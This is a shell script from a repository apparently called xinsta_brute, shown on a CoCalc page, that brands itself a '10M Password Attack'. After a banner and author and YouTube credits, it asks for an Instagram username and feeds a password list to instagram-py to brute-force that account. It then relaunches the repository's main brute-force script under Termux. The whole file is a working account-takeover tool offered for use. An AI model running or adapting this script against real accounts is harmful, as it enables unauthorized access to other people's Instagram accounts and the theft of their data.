Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hackerxphantom
GitHub Repository: hackerxphantom/xinsta_brute
Path: blob/Master/10M-pass/10M-pass.sh
3 views
1
#10M passwors here
2
grn='\033[1;32m'
3
red='\033[1;31m'
4
rset='\033[0m'
5
ylo='\033[1;33m'
6
#!/bin/bash
7
clear
8
echo
9
echo '
10
11
__ ___ _ _ _
12
\ \/ (_)_ __ ___| |_ __ _ | |__ _ __ _ _| |_ ___
13
\ /| | |_ \/ __| __/ _ | | _ \| __| | | | __/ _ \
14
/ \| | | | \__ \ || (_| | | |_) | | | |_| | || __/
15
/_/\_\_|_| |_|___/\__\__,_|___|_.__/|_| \__,_|\__\___|
16
|_____|
17
[#] 10M Password Attack [#]
18
' |lolcat
19
printf "\n"
20
printf " \e[101m\e[1;77m >> Script By Hacker Xphantom XPH4N70M << \e[0m\n"
21
printf "\n"
22
printf " \e[100m\e[1;77m >> Youtube Channel : \e[1;77m HACKER X PHANTOM \e[100m\e[1;77m << \e[0m\n"
23
printf "\n"
24
echo
25
read -p "[#] Enter Instagram ID/Username : " usrnm
26
echo
27
inspass=pass.txt
28
echo -e "\e[1;31m Loading 10M Passwords... \e[0m"
29
sleep 4
30
if [ $inspass = 0 ]
31
then
32
echo -e "$ylo >>> exiting........! Bye Bye :) <<<$rset"
33
else
34
35
instagram-py --username $usrnm --password-list $inspass
36
37
echo
38
sleep 30.0
39
cd /data/data/com.termux/files/home
40
fi
41
sleep 30.0
42
cd /data/data/com.termux/files/home/xinsta_brute
43
bash xinsta_brute.sh
44
45